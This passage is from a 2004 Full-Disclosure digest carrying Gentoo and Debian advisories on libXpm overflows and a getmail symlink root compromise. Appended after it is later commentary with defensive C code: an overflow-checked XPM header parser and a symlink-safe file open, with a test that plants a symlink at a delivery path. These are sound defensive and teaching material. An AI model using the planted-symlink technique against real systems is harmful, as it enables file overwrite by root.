with the privileges of the user running the application.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All X.org users should upgrade to the latest version:

    # emerge sync
    # emerge -pv ">=x11-base/xorg-x11-6.7.0-r2"
    # emerge ">=x11-base/xorg-x11-6.7.0-r2"

All XFree86 users should upgrade to the latest version:

    # emerge sync
    # emerge -pv ">=x11-base/xfree-4.3.0-r7"
    # emerge ">=x11-base/xfree-4.3.0-r7"

Note: Usage of XFree86 is deprecated on the AMD64, HPPA, IA64, MIPS, PPC
and SPARC architectures: XFree86 users on those architectures should
switch to X.org rather than upgrading XFree86.

References
==========

  [ 1 ] X.org Security Advisory
        http://freedesktop.org/pipermail/xorg/2004-September/003196.html
  [ 2 ] X11R6.8.1 Release Notes
        http://freedesktop.org/pipermail/xorg/2004-September/003172.html
  [ 3 ] CAN-2004-0687
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0687
  [ 4 ] CAN-2004-0688
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0688

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200409-34.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security () gentoo org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

--------------enigEA6620FABBD9968E5B2250AD
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: OpenPGP digital signature
Content-Disposition: attachment; filename="signature.asc"

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBV+EAvcL1obalX08RAus+AJ9Og0NSi/Uf/i3Rw0656rai7fKZMwCeJVWS
oxM9KaPNaz3q7G2WAXIvbrg=
=OQU0
-----END PGP SIGNATURE-----

--------------enigEA6620FABBD9968E5B2250AD--

--__--__--

Message: 16
Date: Mon, 27 Sep 2004 11:44:23 +0200
From: Thierry Carrez <koon () gentoo org>
Organization: Gentoo Linux
Cc: bugtraq () securityfocus com, full-disclosure () lists netsys com, security-alerts () linuxsecurity com
To: andreas.zuercher () telma ch
Subject: [Full-disclosure] [gentoo-announce] [ GLSA 200409-34 ] X.org, XFree86: Integer and stack overflows in libXpm

This is an OpenPGP/MIME signed message (RFC 2440 and 3156)
--------------enigEA6620FABBD9968E5B2250AD
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                    Gentoo Linux Security Advisory           GLSA 200409-34
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: X.org, XFree86: Integer and stack overflows in libXpm
      Date: September 27, 2004
      Bugs: #64152
        ID: 200409-34

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

libXpm, the X Pixmap library that is a part of the X Window System,
contains multiple stack and integer overflows that may allow a
carefully-crafted XPM file to crash applications linked against libXpm,
potentially allowing the execution of arbitrary code.

Background
==========

XFree86 and X.org are both implementations of the X Window System.
Affected packages
=================

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  x11-base/xorg-x11       < 6.7.0-r2                    *>= 6.7.0-r2
                                                               == 6.8.0
                                                            >= 6.8.0-r1
  2  x11-base/xfree          < 4.3.0-r7                     >= 4.3.0-r7
    -------------------------------------------------------------------
     # Package 2 [x11-base/xfree] only applies to ALPHA and x86 users.
     NOTE: Any packages listed without architecture tags apply to all
           architectures...
    -------------------------------------------------------------------
     NOTE: Usage of XFree86 is deprecated on the AMD64, HPPA, IA64,
           MIPS, PPC and SPARC architectures: XFree86 users on those
           architectures should switch to X.org rather than upgrading
           XFree86.
    -------------------------------------------------------------------
     2 affected packages
    -------------------------------------------------------------------

Description
===========

Chris Evans has discovered multiple integer and stack overflow
vulnerabilities in the X Pixmap library, libXpm, which is a part of the
X Window System. These overflows can be exploited by the execution of a
malicious XPM file, which can crash applications that are dependent on
libXpm.

Impact
======

A carefully-crafted XPM file could crash applications that are linked
against libXpm, potentially allowing the execution of arbitrary code with
the privileges of the user running the application.

Workaround
==========

There is no known workaround at this time.
Resolution
==========

All X.org users should upgrade to the latest version:

    # emerge sync
    # emerge -pv ">=x11-base/xorg-x11-6.7.0-r2"
    # emerge ">=x11-base/xorg-x11-6.7.0-r2"

All XFree86 users should upgrade to the latest version:

    # emerge sync
    # emerge -pv ">=x11-base/xfree-4.3.0-r7"
    # emerge ">=x11-base/xfree-4.3.0-r7"

Note: Usage of XFree86 is deprecated on the AMD64, HPPA, IA64, MIPS, PPC
and SPARC architectures: XFree86 users on those architectures should
switch to X.org rather than upgrading XFree86.

References
==========

  [ 1 ] X.org Security Advisory
        http://freedesktop.org/pipermail/xorg/2004-September/003196.html
  [ 2 ] X11R6.8.1 Release Notes
        http://freedesktop.org/pipermail/xorg/2004-September/003172.html
  [ 3 ] CAN-2004-0687
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0687
  [ 4 ] CAN-2004-0688
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0688

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200409-34.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security () gentoo org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/1.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBV+EAvcL1obalX08RAus+AJ9Og0NSi/Uf/i3Rw0656rai7fKZMwCeJVWS
oxM9KaPNaz3q7G2WAXIvbrg=
=OQU0
-----END PGP SIGNATURE-----

--__--__--

Message: 17
Date: Mon, 27 Sep 2004 12:34:05 +0200 (CEST)
Reply-To: full-disclosure () lists netsys com
From: debian-security-announce () lists debian org
To: full-disclosure () lists netsys com
Subject: [Full-disclosure] [SECURITY] [DSA 553-1] New getmail packages fix root compromise

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

--------------------------------------------------------------------------
Debian Security Advisory DSA 553-1                    security () debian org
http://www.debian.org/security/                            Martin Schulze
September 27th, 2004                   http://www.debian.org/security/faq
--------------------------------------------------------------------------

Package        : getmail
Vulnerability  : symlink vulnerability
Problem-Type   : local
Debian-specific: no
CVE ID         : CAN-2004-0880 CAN-2004-0881
Debian Bug     : 272561

A security problem has been discovered in getmail, a POP3 and APOP mail
gatherer and forwarder. An attacker with a shell account on the victim's
host could utilise getmail to overwrite arbitrary files when it is
running as root.

For the stable distribution (woody) this problem has been fixed in
version 2.3.7-2.

For the unstable distribution (sid) this problem has been fixed in
version 3.2.5-1.

We recommend that you upgrade your getmail package.

Upgrade Instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody
--------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/g/getmail/getmail_2.3.7-2.dsc
      Size/MD5 checksum:      583 6263f8d2d75ec3eb21dd302e0b9d6729
    http://security.debian.org/pool/updates/main/g/getmail/getmail_2.3.7-2.diff.gz
      Size/MD5 checksum:     2645 ff40d8f72744bfec8a963ece950e0bcd
    http://security.debian.org/pool/updates/main/g/getmail/getmail_2.3.7.orig.tar.gz
      Size/MD5 checksum:    70944 4eef6be77a4cbe1a86eef75affd31b05

  Architecture independent components:

    http://security.debian.org/pool/updates/main/g/getmail/getmail_2.3.7-2_all.deb
      Size/MD5 checksum:    74388 f2b9e79b1ddd8ef8bf719d4e1894f051

  These files will probably be moved into the stable distribution on
  its next update.

---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce () lists debian org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)

iD8DBQFBV+ydW5ql+IAeqTIRAjKVAJ4jTCBi6jY/HaghCNdQUVfyy2giOQCbB688
7yr1RQ2U25tXqQDxJZqHyPE=
=3lYo
-----END PGP SIGNATURE-----

--__--__--

_______________________________________________
Full-Disclosure mailing list
Full-Disclosure () lists netsys com
http://lists.netsys.com/mailman/listinfo/full-disclosure

End of Full-Disclosure Digest
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
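GLSA 200409-34 in the digest above describes integer and stack overflows in libXpm that a crafted XPM file can trigger. The C block below is an added example, not libXpm's code and not part of the advisory: it parses the mandatory four fields of an XPM3 "<Values>" string ("width height ncolors chars_per_pixel"), rejects signs, junk and zero fields, and derives buffer sizes with explicit multiplication-overflow checks so that an oversized width or height can never wrap into an undersized allocation. The names (`xpm_parse_values`, `xpm_checked_pixel_bytes` and friends), the one-unsigned-int-per-pixel representation, and the decision to reject the optional hotspot and XPMEXT fields are this example's own assumptions.

```c
#include <errno.h>
#include <limits.h>
#include <stdint.h>
#include <stdlib.h>

/* The four mandatory fields of an XPM3 "<Values>" string:
 * "<width> <height> <ncolors> <chars_per_pixel>". */
struct xpm_values {
    unsigned int width;
    unsigned int height;
    unsigned int ncolors;
    unsigned int cpp;
};

/* Parse one unsigned decimal field at *cursor and advance past it.
 * A leading '-' or '+' is rejected explicitly: strtoul() would silently
 * accept "-1" and wrap it to a huge value. */
static int parse_uint_field(const char **cursor, unsigned int *out)
{
    const char *p = *cursor;
    char *end;
    unsigned long v;

    while (*p == ' ' || *p == '\t')
        p++;
    if (*p < '0' || *p > '9')
        return -1;
    errno = 0;
    v = strtoul(p, &end, 10);
    if (errno != 0 || v > UINT_MAX)
        return -1;
    *cursor = end;
    *out = (unsigned int)v;
    return 0;
}

/* Parse the values string. Returns 0 on success, -1 on malformed input.
 * Assumption of this example: only the four mandatory fields are accepted;
 * the optional hotspot and XPMEXT fields are rejected. */
int xpm_parse_values(const char *line, struct xpm_values *out)
{
    const char *cur = line;
    unsigned int f[4];
    int i;

    for (i = 0; i < 4; i++)
        if (parse_uint_field(&cur, &f[i]) != 0)
            return -1;
    while (*cur == ' ' || *cur == '\t' || *cur == '\r' || *cur == '\n')
        cur++;
    if (*cur != '\0')
        return -1;
    /* Zero dimensions, colors or chars-per-pixel would make the later
     * size arithmetic produce zero-length buffers. */
    if (f[0] == 0 || f[1] == 0 || f[2] == 0 || f[3] == 0)
        return -1;
    out->width = f[0];
    out->height = f[1];
    out->ncolors = f[2];
    out->cpp = f[3];
    return 0;
}

/* a * b into *out, failing instead of wrapping around. */
static int mul_size_checked(size_t a, size_t b, size_t *out)
{
    if (a != 0 && b > SIZE_MAX / a)
        return -1;
    *out = a * b;
    return 0;
}

/* Bytes for a width x height array of pixel indices (one unsigned int per
 * pixel, this example's representation). Returns 0 on overflow so a
 * caller can never allocate a wrapped, too-small buffer. */
size_t xpm_pixel_bytes(const struct xpm_values *v)
{
    size_t npix, bytes;
    if (mul_size_checked(v->width, v->height, &npix) != 0)
        return 0;
    if (mul_size_checked(npix, sizeof(unsigned int), &bytes) != 0)
        return 0;
    return bytes;
}

/* Bytes for one row of pixel characters plus a terminating NUL. */
size_t xpm_row_bytes(const struct xpm_values *v)
{
    size_t chars;
    if (mul_size_checked(v->width, v->cpp, &chars) != 0 || chars == SIZE_MAX)
        return 0;
    return chars + 1;
}

/* Parse a values line and return the checked pixel-buffer size, or 0 if
 * the line is rejected or the size would overflow. */
size_t xpm_checked_pixel_bytes(const char *line)
{
    struct xpm_values v;
    if (xpm_parse_values(line, &v) != 0)
        return 0;
    return xpm_pixel_bytes(&v);
}
```

The point to take from it is the shape of the check, not the numbers: every size that feeds an allocation or a fixed buffer is derived through a function that can fail, and a failure means "refuse the file", never "allocate what wrapped".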
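DSA 553-1 above concerns getmail, running as root, being made to overwrite arbitrary files through a symlink planted where it delivers mail. The C block below is an added example of the defensive open pattern; it is not getmail's code (getmail is Python) and not part of the advisory. It refuses to follow a symlink at the delivery path (O_NOFOLLOW), creates new message files only if the name did not already exist (O_EXCL), and verifies the opened descriptor with fstat() instead of trusting the path. The function names, the temporary-directory scenario and the choice of the current uid as `expected_owner` are constructed for this example.

```c
#define _POSIX_C_SOURCE 200809L
#define _DEFAULT_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open an existing mbox-style file for append. O_NOFOLLOW makes open()
 * fail with ELOOP if the final path component is a symlink; the fstat()
 * on the descriptor (not on the path, which could be swapped under us)
 * confirms we hold a regular, unshared file owned by the recipient. */
int open_mailbox_nofollow(const char *path, uid_t expected_owner)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_APPEND | O_NOFOLLOW | O_NOCTTY);
    if (fd < 0)
        return -1;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != expected_owner || st.st_nlink != 1) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Create a new maildir-style message file. O_EXCL guarantees the name did
 * not exist before, so a planted symlink or hard link cannot be reused. */
int create_delivery_file(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

static int write_all(int fd, const char *s)
{
    size_t len = strlen(s), done = 0;
    while (done < len) {
        ssize_t n = write(fd, s + done, len - done);
        if (n <= 0)
            return -1;
        done += (size_t)n;
    }
    return 0;
}

/* Constructed scenario in a fresh temporary directory: "secret" stands in
 * for a file the deliverer must never touch, "mbox" is a legitimate
 * mailbox, and "evil" is a symlink planted at a delivery name pointing at
 * "secret". Returns 0 when every defense behaved as expected; each set bit
 * identifies a check that failed. */
int demo_symlink_defense(void)
{
    char dir[] = "/tmp/deliver-demo-XXXXXX";
    char secret[128], mbox[128], evil[128], fresh[128], buf[64];
    int fd, result = 0;
    ssize_t n;

    if (mkdtemp(dir) == NULL)
        return 1;
    snprintf(secret, sizeof secret, "%s/secret", dir);
    snprintf(mbox, sizeof mbox, "%s/mbox", dir);
    snprintf(evil, sizeof evil, "%s/evil", dir);
    snprintf(fresh, sizeof fresh, "%s/msg.1", dir);

    fd = create_delivery_file(secret);
    if (fd < 0 || write_all(fd, "keep me") != 0) result |= 2;
    if (fd >= 0) close(fd);
    fd = create_delivery_file(mbox);
    if (fd < 0) result |= 4; else close(fd);
    if (symlink(secret, evil) != 0) result |= 8;

    /* 1. appending through the planted symlink must be refused */
    fd = open_mailbox_nofollow(evil, getuid());
    if (fd >= 0) { result |= 16; close(fd); }
    /* 2. appending to the real mailbox must still work */
    fd = open_mailbox_nofollow(mbox, getuid());
    if (fd < 0 || write_all(fd, "From x\n") != 0) result |= 32;
    if (fd >= 0) close(fd);
    /* 3. creating a "new" file where the symlink already sits must fail */
    fd = create_delivery_file(evil);
    if (fd >= 0) { result |= 64; close(fd); }
    /* 4. creating a genuinely new file must succeed */
    fd = create_delivery_file(fresh);
    if (fd < 0) result |= 128; else close(fd);
    /* 5. the protected file is untouched */
    fd = open(secret, O_RDONLY | O_NOFOLLOW);
    n = fd >= 0 ? read(fd, buf, sizeof buf - 1) : -1;
    if (fd >= 0) close(fd);
    if (n != 7 || memcmp(buf, "keep me", 7) != 0) result |= 256;

    unlink(fresh); unlink(evil); unlink(mbox); unlink(secret); rmdir(dir);
    return result;
}
```

These checks limit what a planted link can reach, but they do not replace the stronger fix the advisory's "root compromise" wording points at: a mail deliverer should not be writing into user-controlled directories with root privileges at all, and should drop to the recipient's uid before it opens anything there.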
Current thread:
- [Full-Disclosure] Re: Full-disclosure digest, Vol 1 #1933 - 20 msgs milw0rm Inc. (Sep 28)
- Re: [Full-Disclosure] Re: Full-disclosure digest, Vol 1 #1933 - 20 msgs DanB UK (Sep 28)
- Re: [Full-Disclosure] Re: Full-disclosure digest, Vol 1 #1933 - 20 msgs Barry Fitzgerald (Sep 28)
- RE: [Full-Disclosure] Re: Full-disclosure digest, Vol 1 #1933 - 20 Geo. (Sep 28)
- Re: [Full-Disclosure] Re: Full-disclosure digest, Vol 1 #1933 - 20 Barry Fitzgerald (Sep 28)
- RE: [Full-Disclosure] Re: Full-disclosure digest, Vol 1 #1933 - 20 Geo. (Sep 28)
- <Possible follow-ups>
- RE: [Full-Disclosure] Re: Full-disclosure digest, Vol 1 #1933 - 20 msgs Todd Towles (Sep 29)
- Re: [Full-Disclosure] Re: Full-disclosure digest, Vol 1 #1933 - 20 msgs DanB UK (Sep 29)
- Message not available